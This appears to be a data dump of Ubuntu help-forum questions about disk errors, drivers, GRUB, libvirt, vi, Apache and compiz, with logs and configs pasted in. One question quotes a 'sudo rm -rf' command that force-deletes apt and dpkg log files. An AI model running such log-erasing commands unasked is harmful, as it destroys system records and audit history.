old_age always - 0 12 power_cycle_count 0x0032 100 100 000 old_age always - 2080 192 power-off_retract_count 0x0032 100 100 000 old_age always - 238 193 load_cycle_count 0x0032 073 073 000 old_age always - 277107 194 temperature_celsius 0x0022 100 100 000 old_age always - 46 ( min/max 10/73 ) 196 reallocated_event_count 0x0032 100 100 000 old_age always - 3 197 current_pending_sector 0x0032 100 100 000 old_age always - 67 198 offline_uncorrectable 0x0030 100 100 000 old_age offline - 0 199 udma_crc_error_count 0x0032 200 200 000 old_age always - 0 220 disk_shift 0x0002 100 100 000 old_age always - 87 222 loaded_hours 0x0032 048 048 000 old_age always - 20891 223 load_retry_count 0x0032 100 100 000 old_age always - 0 224 load_friction 0x0022 100 100 000 old_age always - 0 226 load-in_time 0x0026 100 100 000 old_age always - 329 240 head_flying_hours 0x0000 100 100 000 old_age offline - 0 smart error log version : 1 ata error count : 1725 ( device log contains only the most recent five errors ) cr = command register [ hex ] fr = features register [ hex ] sc = sector count register [ hex ] sn = sector number register [ hex ] cl = cylinder low register [ hex ] ch = cylinder high register [ hex ] dh = device/head register [ hex ] dc = device command register [ hex ] er = error register [ hex ] st = status register [ hex ] powered_up_time is measured from power on , and printed as ddd+hh : mm : ss.sss where dd=days , hh=hours , mm=minutes , ss=sec , and sss=millisec . it `` wraps '' after 49.710 days . error 1725 occurred at disk power-on lifetime : 23519 hours ( 979 days + 23 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 41 02 e4 3f 7d 4c error : unc at lba = 0x0c7d3fe4 = 209534948 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 60 f8 00 40 3f 7d 40 00 00:03:54.685 read fpdma queued ef 10 02 00 00 00 a0 00 00:03:54.684 set features [ reserved for serial ata ] 27 00 00 00 00 00 e0 00 00:03:54.684 read native max address ext ec 00 00 00 00 00 a0 00 00:03:54.684 identify device ef 03 45 00 00 00 a0 00 00:03:54.684 set features [ set transfer mode ] error 1724 occurred at disk power-on lifetime : 23519 hours ( 979 days + 23 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 41 02 e4 3f 7d 4c error : unc at lba = 0x0c7d3fe4 = 209534948 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 60 f8 00 40 3f 7d 40 00 00:03:35.362 read fpdma queued ef 10 02 00 00 00 a0 00 00:03:35.362 set features [ reserved for serial ata ] 27 00 00 00 00 00 e0 00 00:03:35.362 read native max address ext ec 00 00 00 00 00 a0 00 00:03:35.361 identify device ef 03 45 00 00 00 a0 00 00:03:35.361 set features [ set transfer mode ] error 1723 occurred at disk power-on lifetime : 23519 hours ( 979 days + 23 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 41 02 e4 3f 7d 4c error : unc at lba = 0x0c7d3fe4 = 209534948 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 60 f8 00 40 3f 7d 40 00 00:03:13.625 read fpdma queued ef 10 02 00 00 00 a0 00 00:03:13.625 set features [ reserved for serial ata ] 27 00 00 00 00 00 e0 00 00:03:13.625 read native max address ext ec 00 00 00 00 00 a0 00 00:03:13.624 identify device ef 03 45 00 00 00 a0 00 00:03:13.624 set features [ set transfer mode ] error 1722 occurred at disk power-on lifetime : 23519 hours ( 979 days + 23 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 41 02 c0 3f 7d 4c error : unc at lba = 0x0c7d3fc0 = 209534912 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 60 f8 00 40 3f 7d 40 00 00:03:00.058 read fpdma queued ef 10 02 00 00 00 a0 00 00:03:00.058 set features [ reserved for serial ata ] 27 00 00 00 00 00 e0 00 00:03:00.058 read native max address ext ec 00 00 00 00 00 a0 00 00:03:00.057 identify device ef 03 45 00 00 00 a0 00 00:03:00.057 set features [ set transfer mode ] error 1721 occurred at disk power-on lifetime : 23519 hours ( 979 days + 23 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 41 02 e4 3f 7d 4c error : unc at lba = 0x0c7d3fe4 = 209534948 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 60 08 08 38 40 7d 40 00 00:02:02.748 read fpdma queued 60 f8 00 40 3f 7d 40 00 00:02:02.748 read fpdma queued 60 08 00 98 38 7d 40 00 00:01:59.313 read fpdma queued 60 08 00 78 d8 7c 40 00 00:01:55.923 read fpdma queued 60 08 00 10 b8 7c 40 00 00:01:55.901 read fpdma queued smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 extended offline completed without error 00 % 23441 - # 2 short offline completed without error 00 % 4 - # 3 short offline completed without error 00 % 3 - # 4 short offline completed without error 00 % 3 - # 5 short offline completed without error 00 % 3 - # 6 short offline completed without error 00 % 3 - # 7 short offline completed without error 00 % 2 - # 8 short offline completed without error 00 % 2 - # 9 short offline completed without error 00 % 2 - # 10 short offline completed without error 00 % 1 - # 11 short offline completed without error 00 % 1 - # 12 short offline completed without error 00 % 1 - # 13 short offline completed without error 00 % 1 - # 14 short offline completed without error 00 % 0 - # 15 short offline completed without error 00 % 0 - # 16 short offline completed without error 00 % 0 - smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay . and : user @ debian : ~ $ sudo e2fsck -fy /dev/sdb6 e2fsck 1.42.5 ( 29-jul-2012 ) pass 1 : checking inodes , blocks , and sizes pass 2 : checking directory structure pass 3 : checking directory connectivity pass 4 : checking reference counts pass 5 : checking group summary information /dev/sdb6 : 234336/5537792 files ( 1.5 % non-contiguous ) , 14142287/22146972 blocks
345209	bluetooth ralink rt3290 not detected in ubuntu 12.04	i had this issue in ubuntu 12.04 lts 64 bit . bluetooth is not detected . wifi works fine . i had tried a lot of solutions from forums but i had no luck . seems that for kernel 3.8 doesn not have available driver for this ralink rt3290 blueetooth/wifi card . can not compile it : cp rtbth.ko ~/bluetooth cd ..errror rtbth.ko file does not exist ... any advice will be greatly appreciated . thanks !
345210	usb icon set script	perhaps someone could point me in the right direction . i am learning scripting and would like to know where ubuntu based distros get their default icons for things like usb drives . what i would like to do is implement a script that emulates the method mac os uses to set custom icons for external drives , etc . basically if a transparent png file is present at the root of the drive with a .name.png naming format i 'd like that image to be the default icon for the drive . in this manner any drive can have a customized image based on whatever png is placed on the drive . so this script would check for the existence of the file , if true then apply that image as the icon , if not then default to the system default icon set . this script would need to run any time a new usb drive is connected or cd is entered in the machine . anyone have pointers on where the config files are that direct what icons to use and possibly some good bash scripting references to apply an image as an icon for a mounted drive/disc ? thanks !
345213	after upgrade from 12.10 to 13.04 unity does n't work	i have upgraded ubuntu from 12.10 to 13.04 . first look was all good . after restart , there is no unity . i have tried : dconf reset -f /org/compiz/ unity -- reset-icons but it did n't help . what should i do ? sorry for my 'great ' english .
345216	pptp vpn problem	i have 3 pptp vpn accounts , they connect normally with wired connections but they do n't connect with wireless connections , with message says vpn failed . please help me , thanks .
345218	virt-manager ca n't connect to libvirt	i 'm running ubuntu 12.04.2 32 bits . the error does n't show up if i start gksudo virt-manager . libvirt-bin is installed . i do n't know how to check for the daemon . i am a member of libvirtd . output of ps ax | grep libvirt : 9225 ? sl 0:04 /usr/sbin/libvirtd -d 9302 ? s 0:00 /usr/sbin/dnsmasq -u libvirt-dnsmasq -- strict-order -- bind-interfaces -- pid-file=/var/run/libvirt/network/default.pid -- conf-file= -- except-interface lo -- listen-address 192.168.122.1 -- dhcp-range 192.168.122.2,192.168.122.254 -- dhcp-leasefile=/var/lib/libvirt/dnsmasq/default.leases -- dhcp-lease-max=253 -- dhcp-no-override` output of ls -l /var/run/libvirt/libvirt-sock : srwxrwx -- - 1 root libvirtd 0 set 13 15:04 /var/run/libvirt/libvirt-sock output of getent group libvirtd : libvirtd : x:130 : otheruser , myuser detailed error message impossível conectar a libvirt : falha ao conectar socket a '/var/run/libvirt/libvirt-sock ' : permissão negada verify that : - the 'libvirt-bin ' package is installed - the 'libvirtd ' daemon has been started - you are member of the 'libvirtd ' group a uri libvirt é : qemu : ///system traceback ( most recent call last ) : file `` /usr/share/virt-manager/virtmanager/connection.py '' , line 1185 , in _open_thread self.vmm = self._try_open ( ) file `` /usr/share/virt-manager/virtmanager/connection.py '' , line 1167 , in _try_open flags ) file `` /usr/lib/python2.7/dist-packages/libvirt.py '' , line 102 , in openauth if ret is none : raise libvirterror ( 'virconnectopenauth ( ) failed ' ) libvirterror : falha ao conectar socket a '/var/run/libvirt/libvirt-sock ' : permissão negada
345220	remove files in a directory based on partial name	i wanted to know what is the best way to remove any files no matter what their extension is based on a partial name . example : 13-05-12_foo_something.jpg 13-06-01_something.png 13-05-05_foo_site.html rm everything in a directory and within the sub folders with _foo_ in the name .
345222	how do i clear software center history ?	i have old software center history from way back in june and i would like to clear it all but i have tried sudo rm -rf /var/log/apt/history.log /var/log/dpkg.log ut it did not work
345224	installing ubuntu on my pc with windows8 preinstalled	i am trying to install ubuntu on my of with uefi mode and it 's a 64bit installer . when the grub menu came up i chose try ubuntu and since then the screen has just been black . is there a problem ?
345225	install ubuntu as vhd alongside windows 8 , windows 7	i have windows 7 as my primary os , and i have also installed windows 8 on a vhd and i am able to boot from that vhd as well , so in my boot menu i get options for both windows 7 and windows 8 . now i want to install ubuntu on a vhd and want it to appear as option on boot screen . is that possible , if yes , how ? thanks .
345226	how do i view or install ubuntu touch apps ?	lots of people have started developing ubuntu touch apps for the ubuntu app showdown and just in general , and have published them in the click app store . what is the click app store , and how do i install apps published in it ?
345230	how do i get my canon pixma ip1500 to work with 12.04 ?	how do i get my canon pixma ip1500 to work with 12.04 ? i have tried many things and ubuntu says it is installed and working . the printer works in windows so i know it is functioning , i just would rather use ubuntu !
345234	does anyone know of a voicechanger that i can use with skype ?	does anyone know of a live voice changer that i can connect to skype so that i can have some fun with my friends ?
345237	i have just installed 13.04 and am confused buy the security pass-phrase/encryption options	i included both the security options in my installation . the one was a pass-phrase i chose and the other was a pass phrase generated buy ubuntu . what are the each for ? i have never had to use the code that was generated , when would i ever need to use it ? i am confused . i now have to enter a code when i turn on and my regular log in . do i need them both ? can one be removed and if so what is the best one to deactivate ?
345238	login prompt remains displayed after login	the login pannel freezes ... .unable to change wallpaper
345240	eclipse cdt : or32-elf.gcc not found in path	i am using ubuntu 13.04 and i am not able to compile projects on eclipse cdt . it gives error saying no rule to make target , makefile properties not found and also or32-elf.gcc not found in path i checked the path variable and gcc is already there . how do i solve this ?
345242	can i run ubuntu studio on a server or must i only run ubuntu server ?	i would like to purchase a legacy server with 8 to 16 cores and use it as a workstation . can i run ubuntu studio on a server or must i only run ubuntu server ? will the speed of say video editing be enhanced by a system ?
345252	lenovo g580 need help with wifi card 12.04 64 bit	ive done everything for terminal install from taking it off and putting it back on am having issues with the wifi card like when i first installed ubuntu it worked the first 3 times off use but it would drop then it would be turning on now the wifi wont even show up id really love some help i love this os just if i cant use my wifi am kinda sol
345253	pc wont boot with sd card reader plugged in	when i installed 12.04 on new hdd i didnt have the card reader plugged in before partitioning , now that my gateway zx4000 is all set up i realized the card reader hadnt been plugged in so now when i try to plug it in while my pc is on the system will power off and when i reboot it gives me some kind of error message and wont reboot until i unplug the card reader , any help is appreciated . ( card reader is where you insert video/photo sd card correct ? )
345254	there is no menu.lst under /boot/grub and 12.04 server ca n't boot	the newly re-installed 12.04.3 server has the same problem as it was before . the problem is that the server can not boot up by itself . sometime it goes into blank and never come out . sometime it shows boot menu and hung after attached scsi drive . in this case , we just need to type 'exit ' to get to the login prompt . the problem is similar to the post below : http : //askubuntu.com/questions/109500/boot-issues-long-delay-then-gave-up-waiting-for-root-device we found that under /boot/grub , there is no menu.lst . is it normal to have no menu.lst under /boot/grub ? if this is a problem , how to fix it ? thanks . ===grub.cfg # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root e17df6f9-8d08-4d85-be32-4049ad596c4e if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root e17df6f9-8d08-4d85-be32-4049ad596c4e set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=2 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 3.8.0-29-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root e17df6f9-8d08-4d85-be32-4049ad596c4e linux /boot/vmlinuz-3.8.0-29-generic root=uuid=e17df6f9-8d08-4d85-be32-4049ad596c4e ro initrd /boot/initrd.img-3.8.0-29-generic } menuentry 'ubuntu , with linux 3.8.0-29-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root e17df6f9-8d08-4d85-be32-4049ad596c4e echo 'loading linux 3.8.0-29-generic ... ' linux /boot/vmlinuz-3.8.0-29-generic root=uuid=e17df6f9-8d08-4d85-be32-4049ad596c4e ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.8.0-29-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root e17df6f9-8d08-4d85-be32-4049ad596c4e linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root e17df6f9-8d08-4d85-be32-4049ad596c4e linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # #
345256	making an app for ubuntu software centre	i would love to make apps and publish them on the ubuntu software centre . after following the instructions on the developer centre , i built an app and published it . now i have realised i have built an app for ubuntu touch . there does n't seem to be an sdk for making ubuntu desktop apps . is there one ? where can i find simple instructions to make and upload an ubuntu desktop app ? thanks .
345259	what is up with my vi/vim installation ?	i had asked this question earlier but it got deleted because i happened to mention that i was using ubuntu 9.04 . well , i have upgraded to the second latest version,12.04 lts , and vi is still acting up . this problem seems to only happen in vi only because i have tried it with pico and gedit all of which work as expected . in vi , when i am in insert mode : home key inserts h end key inserts f up-arrow key inserts b down-arrow key inserts a left-arrow key inserts c right-arrow inserts d backspace moves cursor to the left without deleting . i find this very irritating . i need to know if this is happening to anyone else . i tried this in my friends hp laptop and it misbehaves the same way so my pc ( acer ) is not the culprit here . i 'm sure there 's an explanation for this , what is it and how can i fix it ?
345260	apache returning messages about not being able to determine fully qualified domain name	i have been trying to run a web server from my home using apache2 . i am a linux newb , so please treat me like i am four years old : p btw ... i am currently using ubuntu 13.10 any way , here is what i get after i restart the server ... . @ linux : ~ $ sudo /etc/init.d/apache2 restart * restarting web server apache2 ah00558 : apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 . set the 'servername ' directive globally to suppress this message there is nothing in this phrase that helps me to understand what just happened other than the server restarted , and even that is suspect . ( told you i am a newb : p ) also , where is the `` servername '' it is talking about so that i can modify it ? any help would be greatly appreciated in this matter .
345264	12.04 wireless not working	i see that this problem has come up several times but none of the solutions have worked for me . i 've tried the rfkill unblock all method . i 've tried finding additional drivers but none come up . i have an asus u56e and my wireless card is intel n 6150 rfkill list all 0 : i2400m-usb:1-1.1:1.0 : wimax soft blocked : yes hard blocked : no 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no 2 : asus-wimax : wimax soft blocked : no hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : no david @ david-u56e : ~ $ lspci | grep -i wireless 02:00.0 network controller : intel corporation centrino wireless-n + wimax 6150 ( rev 67 )
345268	gnome fallback with compiz - maximized windows lose focus	i use gnome-fallback with compiz and docky . however , when i open an application that starts maximized , such as firefox , the window will lose focus if i click anywhere on the window decoration . hovering over the window buttons does not make them change colors as it usually would . this problem arose after changing the window theme using gnome-tweak-tool . i remember having this problem before , and i fixed it by purging and reinstalling compiz . i tried this again , but to no avail . if i minimize the window using docky and then open the window again , the problem is gone . any ideas as to why this is happening ? update : i logged in to gnome fallback using metacity . i opened a terminal and ran compiz -- replace , and the last two lines caught my eye : compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct with this additional information , does anybody know what 's going on ? update : i tried changing the theme using ubuntu tweak rather than the gnome tweak tool . this did not resolve the problem . update : i ran compiz in debug mode . here is the output : josh @ josh-laptop : ~ $ compiz -- replace -- debug -- verbose compiz ( core ) - warn : unknown option ' -- verbose' compiz ( core ) - info : loading plugin : core compiz ( core ) - debug : trying to load core from : /home/josh/ . compiz-1/plugins/libcore.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libcore.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load core from : /usr/lib/ compiz/libcore.so compiz ( core ) - debug : dlopen failed : /usr/lib/ compiz/libcore.so : can not open shared object file : no such file or directory compiz ( core ) - info : starting plugin : core compiz ( core ) - debug : started plugin : core compiz ( core ) - debug : pending request : compiz ( core ) - debug : - event serial : 1721 compiz ( core ) - debug : - event window 0x3e00099 compiz ( core ) - debug : - x : 0 y : 24 width : 1280 height : 714 border : 0 , sibling : 0x0 compiz ( core ) - debug : pending request : compiz ( core ) - debug : - event serial : 1735 compiz ( core ) - debug : - event window 0x3e00099 compiz ( core ) - debug : - x : 0 y : 24 width : 1280 height : 714 border : 0 , sibling : 0x3e00090 compiz ( core ) - debug : pending request : compiz ( core ) - debug : - event serial : 1801 compiz ( core ) - debug : - event window 0x3e0009c compiz ( core ) - debug : - x : 554 y : 290 width : 722 height : 421 border : 0 , sibling : 0x3e00099 compiz ( core ) - debug : pending request : compiz ( core ) - debug : - event serial : 1867 compiz ( core ) - debug : - event window 0x3e0009f compiz ( core ) - debug : - x : 0 y : 24 width : 722 height : 421 border : 0 , sibling : 0x3e0009c compiz ( core ) - info : loading plugin : ccp compiz ( core ) - debug : trying to load ccp from : /home/josh/ . compiz-1/plugins/libccp.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libccp.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load ccp from : /usr/lib/ compiz/libccp.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libccp.so compiz ( core ) - debug : loaded plugin ccp from : /usr/lib/ compiz/libccp.so compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : default compiz ( core ) - debug : started plugin : ccp compiz ( core ) - info : loading plugin : composite compiz ( core ) - debug : trying to load composite from : /home/josh/ . compiz-1/plugins/libcomposite.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libcomposite.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load composite from : /usr/lib/ compiz/libcomposite.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libcomposite.so compiz ( core ) - debug : loaded plugin composite from : /usr/lib/ compiz/libcomposite.so compiz ( core ) - info : starting plugin : composite compiz ( core ) - debug : started plugin : composite compiz ( core ) - info : loading plugin : opengl compiz ( core ) - debug : trying to load opengl from : /home/josh/ . compiz-1/plugins/libopengl.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libopengl.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load opengl from : /usr/lib/ compiz/libopengl.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libopengl.so compiz ( core ) - debug : loaded plugin opengl from : /usr/lib/ compiz/libopengl.so compiz ( core ) - info : starting plugin : opengl compiz ( core ) - debug : started plugin : opengl compiz ( core ) - info : loading plugin : imgjpeg compiz ( core ) - debug : trying to load imgjpeg from : /home/josh/ . compiz-1/plugins/libimgjpeg.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libimgjpeg.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load imgjpeg from : /usr/lib/ compiz/libimgjpeg.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libimgjpeg.so compiz ( core ) - debug : loaded plugin imgjpeg from : /usr/lib/ compiz/libimgjpeg.so compiz ( core ) - info : starting plugin : imgjpeg compiz ( core ) - debug : started plugin : imgjpeg compiz ( core ) - info : loading plugin : decor compiz ( core ) - debug : trying to load decor from : /home/josh/ . compiz-1/plugins/libdecor.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libdecor.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load decor from : /usr/lib/ compiz/libdecor.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libdecor.so compiz ( core ) - debug : loaded plugin decor from : /usr/lib/ compiz/libdecor.so compiz ( core ) - info : starting plugin : decor compiz ( core ) - debug : started plugin : decor compiz ( core ) - info : loading plugin : imgpng compiz ( core ) - debug : trying to load imgpng from : /home/josh/ . compiz-1/plugins/libimgpng.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libimgpng.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load imgpng from : /usr/lib/ compiz/libimgpng.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libimgpng.so compiz ( core ) - debug : loaded plugin imgpng from : /usr/lib/ compiz/libimgpng.so compiz ( core ) - info : starting plugin : imgpng compiz ( core ) - debug : started plugin : imgpng compiz ( core ) - info : loading plugin : gnomecompat compiz ( core ) - debug : trying to load gnomecompat from : /home/josh/ . compiz-1/plugins/libgnomecompat.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libgnomecompat.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load gnomecompat from : /usr/lib/ compiz/libgnomecompat.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libgnomecompat.so compiz ( core ) - debug : loaded plugin gnomecompat from : /usr/lib/ compiz/libgnomecompat.so compiz ( core ) - info : starting plugin : gnomecompat compiz ( core ) - debug : started plugin : gnomecompat compiz ( core ) - info : loading plugin : titleinfo compiz ( core ) - debug : trying to load titleinfo from : /home/josh/ . compiz-1/plugins/libtitleinfo.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libtitleinfo.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load titleinfo from : /usr/lib/ compiz/libtitleinfo.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libtitleinfo.so compiz ( core ) - debug : loaded plugin titleinfo from : /usr/lib/ compiz/libtitleinfo.so compiz ( core ) - info : starting plugin : titleinfo compiz ( core ) - debug : started plugin : titleinfo compiz ( core ) - info : loading plugin : vpswitch compiz ( core ) - debug : trying to load vpswitch from : /home/josh/ . compiz-1/plugins/libvpswitch.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libvpswitch.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load vpswitch from : /usr/lib/ compiz/libvpswitch.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libvpswitch.so compiz ( core ) - debug : loaded plugin vpswitch from : /usr/lib/ compiz/libvpswitch.so compiz ( core ) - info : starting plugin : vpswitch compiz ( core ) - debug : started plugin : vpswitch compiz ( core ) - info : loading plugin : place compiz ( core ) - debug : trying to load place from : /home/josh/ . compiz-1/plugins/libplace.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libplace.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load place from : /usr/lib/ compiz/libplace.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libplace.so compiz ( core ) - debug : loaded plugin place from : /usr/lib/ compiz/libplace.so compiz ( core ) - info : starting plugin : place compiz ( core ) - debug : started plugin : place compiz ( core ) - info : loading plugin : snap compiz ( core ) - debug : trying to load snap from : /home/josh/ . compiz-1/plugins/libsnap.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libsnap.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load snap from : /usr/lib/ compiz/libsnap.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libsnap.so compiz ( core ) - debug : loaded plugin snap from : /usr/lib/ compiz/libsnap.so compiz ( core ) - info : starting plugin : snap compiz ( core ) - debug : started plugin : snap compiz ( core ) - info : loading plugin : text compiz ( core ) - debug : trying to load text from : /home/josh/ . compiz-1/plugins/libtext.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libtext.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load text from : /usr/lib/ compiz/libtext.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libtext.so compiz ( core ) - debug : loaded plugin text from : /usr/lib/ compiz/libtext.so compiz ( core ) - info : starting plugin : text compiz ( core ) - debug : started plugin : text compiz ( core ) - info : loading plugin : grid compiz ( core ) - debug : trying to load grid from : /home/josh/ . compiz-1/plugins/libgrid.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libgrid.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load grid from : /usr/lib/ compiz/libgrid.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libgrid.so compiz ( core ) - debug : loaded plugin grid from : /usr/lib/ compiz/libgrid.so compiz ( core ) - info : starting plugin : grid compiz ( core ) - debug : started plugin : grid compiz ( core ) - info : loading plugin : resize compiz ( core ) - debug : trying to load resize from : /home/josh/ . compiz-1/plugins/libresize.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libresize.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load resize from : /usr/lib/ compiz/libresize.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libresize.so compiz ( core ) - debug : loaded plugin resize from : /usr/lib/ compiz/libresize.so compiz ( core ) - info : starting plugin : resize compiz ( core ) - debug : started plugin : resize compiz ( core ) - info : loading plugin : imgsvg compiz ( core ) - debug : trying to load imgsvg from : /home/josh/ . compiz-1/plugins/libimgsvg.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libimgsvg.so : can not open shared object file : no such file or directory 